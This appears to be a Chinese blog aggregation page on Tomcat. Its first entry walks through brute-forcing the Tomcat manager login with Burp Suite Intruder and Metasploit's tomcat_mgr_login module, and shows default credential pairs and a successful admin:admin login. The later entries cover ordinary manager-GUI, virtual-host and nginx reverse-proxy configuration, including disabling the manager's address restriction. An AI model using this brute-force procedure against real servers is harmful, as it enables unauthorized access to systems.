精华内容
下载资源
问答
  • 浏览器访问tomcat管理界面使用burpsuite截断,并输入密码,basic编码后的密码为(admin:admin) 将截断的请求发送到intruder中,并对密码字段添加变量标注: 设置payload字段 设置payload编码方式为base64,...

    burpsuite爆破tomcat管理密码

    1. 浏览器访问tomcat管理界面,使用burpsuite截断,并输入密码,basic编码后的密码为(admin:admin)
      burp截断的密码为base64编码
    2. 将截断的请求发送到intruder中,并对密码字段添加变量标注:
      添加payload位置
    3. 设置payload字段
      密码字段
      用户名密码分隔符字段
      用户名字段
    4. 设置payload编码方式为base64,同时去掉payload的正则匹配
      payload编码
    5. burp爆破成功
      burp爆破成功

    msf爆破tomcat管理密码(推荐方式

    msf5 > use auxiliary/scanner/http/tomcat_mgr_login
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.57.200   # 设置域名
    rhosts => 192.168.57.200
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set USER_FILE use.txt		# 设置用户名文件
    USER_FILE => use.txt
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set PASS_FILE pa.txt		# 设置密码文件
    PASS_FILE => pa.txt
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > show actions
    
    Auxiliary actions:
    
       Name  Description
       ----  -----------
    
    
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
    
    [!] No active DB -- Credential data will not be saved!
    [-] 192.168.57.200:8080 - LOGIN FAILED: admin:adb fbd (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: admin:12345 (Incorrect)
    [+] 192.168.57.200:8080 - Login Successful: admin:admin
    [-] 192.168.57.200:8080 - LOGIN FAILED: 123456:adb fbd (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: 123456:12345 (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: 123456:admin (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: :adb fbd (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: :12345 (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: :admin (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: tomcat:s3cret (Incorrect)
    [-] 192.168.57.200:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    
     
    
    
    展开全文
  • tomcat管理界面配置

    2017-12-20 16:35:08
    2、编辑:根目录下/conf/tomcat-user.xml文件,为其增加角色和用户(使用如下配置代替注释内容) <role rolename="admin-gui"/> <role rolename="manager-...

    1、确保webapps目录下初始的相关管理程序存在,相关程序包含如下目录:docs、examples、host-manager、manager、ROOT

    2、编辑:根目录下/conf/tomcat-user.xml文件,为其增加角色和用户(使用如下配置代替注释内容)

    <role rolename="admin-gui"/>
    <role rolename="manager-gui"/>
    <user username="admin" password="admin" roles="admin-gui,manager-gui"/>

     其中,“admin-gui”角色对应页面Host Manager管理功能,“manager-gui”对应页面Manager App功能。

    展开全文
  • wget访问tomcat管理界面

    2017-05-05 10:03:00
    tomcat已经部署了管理界面,通过如下命令,将tomcat的状态信息打印到status.xml文件中,对于不方便使用浏览器访问该页面的情况,还是很有用的。 wget ...

    tomcat已经部署了管理界面,通过如下命令,将tomcat的状态信息打印到status.xml文件中,对于不方便使用浏览器访问该页面的情况,还是很有用的。

    wget http://localhost:8080/manager/status/all?XML=true --http-user=tomcat --http-password=tomcat -O status.xml

     

    转载于:https://www.cnblogs.com/sybblogs/p/6811517.html

    展开全文
  • port使用不同端口 不同的service内可以任意添加host模块 直接在上插入一个service模块 vi /usr/local/tomcat-8.5.53/conf/server.xml 第一个service模块 cat server.xml <Service name="Catalina1"> <.....

    tomcat虚拟配置基于端口:
    定义多个service模块
    port使用不同端口
    不同的service内可以任意添加host模块
    在这里插入图片描述
    直接在上插入一个service模块

    vi /usr/local/tomcat-8.5.53/conf/server.xml
    第一个service模块

    cat server.xml
      <Service name="Catalina1">
         <Connector port="8081" protocol="HTTP/1.1"
                   connectionTimeout="20000"
                   redirectPort="8443" />
       <Engine name="Catalina" defaultHost="localhost">
    <Realm className="org.apache.catalina.realm.LockOutRealm">
    <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
                   resourceName="UserDatabase"/>
    </Realm>
     <Host name="www.t001.com"  appBase="webapps"
                unpackWARs="true" autoDeploy="true">
    <Context path="" docBase="/usr/local/tomcat-8.5.53/webapps/web01" debug="0" reloadable="true" crossContext="true"> </Context> 
            </Host>
    </Engine>
        </Service>
    

    第二个service模块

      <Service name="Catalina1">
         <Connector port="8081" protocol="HTTP/1.1"
                   connectionTimeout="20000"
                   redirectPort="8443" />
       <Engine name="Catalina" defaultHost="localhost">
    <Realm className="org.apache.catalina.realm.LockOutRealm">
    <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
                   resourceName="UserDatabase"/>
    </Realm>
     <Host name="www.t001.com"  appBase="webapps"
                unpackWARs="true" autoDeploy="true">
    <Context path="" docBase="/usr/local/tomcat-8.5.53/webapps/web01" debug="0" reloadable="true" crossContext="true"> </Context> 
            </Host>
    </Engine>
        </Service>
    

    重启tomcat服务:
    [root@t001 web02]# /usr/local/tomcat-8.5.53/bin/shutdown.sh

    [root@t001 web02]# /usr/local/tomcat-8.5.53/bin/startup.sh

    查看新增的端口:
    在这里插入图片描述
    测试:
    在这里插入图片描述
    在这里插入图片描述
    tomcat管理界面登录配置:
    可以查看服务器状态:
    在这里插入图片描述
    在这里插入图片描述
    修改两个地方:
    例如,要将经理-gui角色添加到名称为 tomcat且密码为s3cret的用户,请将以下内容添加到上面列出的配置文件中。
    Vi /usr/local/tomcat8.5.53/conf/tomcat-users.xml

      <role rolename="manager-gui"/>
      <user username="tomcat" password="tomcat" roles="manager-gui"/>
    

    设置远端服务地址限制:
    编辑/usr/local/tomcat8.5.53/webapps/manager/META-INF/context.xml

    注释如下:

    <!--
      <Valve className="org.apache.catalina.valves.RemoteAddrValve"
             allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" />
    -->
    

    在这里插入图片描述
    在这里插入图片描述

    nginx+tomcat动静分离模式:
    通过表达式判断由谁处理网页
    nginx处理静态网页
    把动态网页转发给tomcat

    gif|jpg|jpeg|png|bmp|swf 以这些.结尾为格式的由nginx处理静态网页
    gif|jpg|jpeg|png|bmp|swf 以这些.结尾为格式的由nginx处理静态网页

    location ~ \.(gif|jpg|jpeg|png|bmp|swf)$ {
        root /web01;
    

    jsp|do由这些.结尾为格动态网页转发给tomcat

    [root@t003 ~]# vi /etc/nginx/nginx.conf:
    cat /etc/nginx/nginx.conf

    server {
        listen 80;
        server_name 192.168.20.10;
        location / {
        index index.html;
        root /web01;
            }
    
        location ~ \.(gif|jpg|jpeg|png|bmp|swf)$ {
        root /web01;
                        }
    
        location ~ \.(jsp|do)$ {
        proxy_pass http://192.168.20.130:8081;
                        }
        }
    

    测试
    当访问http://192.168.20.10/index.html —>由nginx处理
    当访问http://192.168.20.10/index.jsp —>由tomcat处理

    展开全文
  • tomcat管理界面常用设置 -- 配置数据库连接池document.title="tomcat管理界面常用设置 -- 配置数据库连接池 - "+document.title 使用管理界面配置连接池比改动xml文件安全得多,而且方便快捷。1.登陆管理...
  • 大概率是因为自己对Tomcat以及jvm不熟;今天上午一直在碰到问题解决问题,把问题记录一下,理解一下为什么会出现这种问题。web项目启动的时候:1.jrebel的team url问题team url经常会过期,网上能找到可以用的不容易...
  • 我们打开tomcat的webapp目录,会存在很多 'context' ,其中一个就是 manager在manager的管理页面,我们能够查看到所有部署的应用的运行状态、也能管理应用的运行同时还能部署新的web应用想要使用tomcat管理页面,...
  • 我下载的Tomcat 6.0.35是免安装的,而以前使用Tomcat 6.0.20是需要安装的,而且Tomcat 6.0.20 的安装密码,即进入Tomcat Manager 这个地方的密码是在安装的时候指定的,但是呢,Tomcat 6.0.35 由于是免安装的,...
  • 想要访问tomcat管理界面,需要配置用户和角色信息-tomcat-users.xml: <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file ...
  • tomcat配置图形化管理界面

    千次阅读 2019-08-23 10:16:42
    tomcat配置图形化管理界面 一、介绍 Tomcat已经为我们定义了4种不同的角色——也就是4个rolename,我们只需要使用Tomcat为我们定义的这几种角色就足够满足我们的工作需要了。 以下是Tomcat Manager 4种角色的大致...
  • Tomcat 5.5 以后的binary 核心安装版不再集成Tomcat Administration WebApplication,需要独立下载安装。...不过在网上查到可以使用Tomcat 5.5 的Administration Web Application在Tomcat 6.0下配置...
  • Tomcat的默认工具manager配置,在很多的生产环境中由于基本用不到、或者是不太需要使用Tomcat默认的manager管理页面时一般都会把Tomcat的默认webapp下的内容给删除了,但是如果需要使用Tomcat默认的manager来管理...
  • 通过管理同行界面可以监控到jvm使用状况,线程的启动状况,请求的执行时间等很多参数。前面做maxthreads设置的时候通过该界面监控tomcat状态,非常好用。 添加tomcat-users.xml配置 <tomcat-users xmlns=...
  • tomcat配置监控界面

    千次阅读 2018-04-11 09:43:40
    tomcat配置监控界面,记录以防以后再次使用第一部分,使用tomcat自带的manager来监控 首先$CATALINA_HOME/webapps下需要有tomcat自带的ROOT(欢迎页面)和manager(Tomcat管理页面)目录 tomcat8.0上,直接修改配置...
  • 访问tomcat manager应用时,需要管理员的用户名和密码。 编辑tomcat conf文件夹下的tomcat-users.xml: 添加manager role和对应的...之后重启tomcat,就能使用jerry和jerry@sap访问tomcat管理界面了。 要获取更多
  • tomcat使用manager管理app时需要身份验证问题 我们可以通过图形用户界面管理tomcat,启动tomcat,在地址栏中输入: Java代码 http://localhost:8080 就可以看见tomcat的欢迎页面,点击左边的tomcat manager 就会...
  • Tomcat配置及使用

    千次阅读 2016-11-22 22:02:01
    ---------------------------配置及测试tomcat服务 复制绿色版tomcat 在D:\eclipse\tomcat7\bin中点击startup.bat启动Tomcat服务 在浏览器里打开 http://localhost:8080/,看到页面表示成功,首页文件是...管理界面:ht
  • Tomcat(四):tomcat图形管理和身份认证

    千次阅读 2020-12-03 18:44:10
    tomcat和大多数服务程序的管理不一样,tomcat更适合使用图形管理界面进行管理,例如在不停止tomcat的情况下动态部署新的webapp或重新加载webapp。如果不使用图形管理工具,tomcat虽然也可以配置自动部署(autoDeploy=...
  • Tomcat使用记录

    2018-08-16 11:02:00
     1、tomcat自带manager站点,可以通过http://host:port/manager访问管理界面使用http://host:port/manager/text进行远程部署。  2、tomcat默认的manager只能本机访问,需要修改在conf/Catalina/localhost/...
  • 旅游管理系统Tomcat

    2017-11-30 18:33:05
    旅游管理系统,挂于Tomcat服务器使用,生成简单地图,图形化界面,网页显示,有注释
  • 一.在tomcat_home/common下放入jdbc的三个驱动程序(一定要的哦),可以在微软的网站上去下载,安装的SQLSERVER2k默认的...出现不能引用错误的话一般就是路径没有写对,tomcat默认的路径是tomcat_home/webapps/不过使用5
  • 一、安装   启动tomcat后,在地址栏中输入http://localhost:8080/admin,如果出现如下登陆界面,则证明你所使用TOMCAT已经正常安装了Tomcat Administration Web Application,则不必进行下面的安装...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 560
精华内容 224
关键字:

tomcat管理界面使用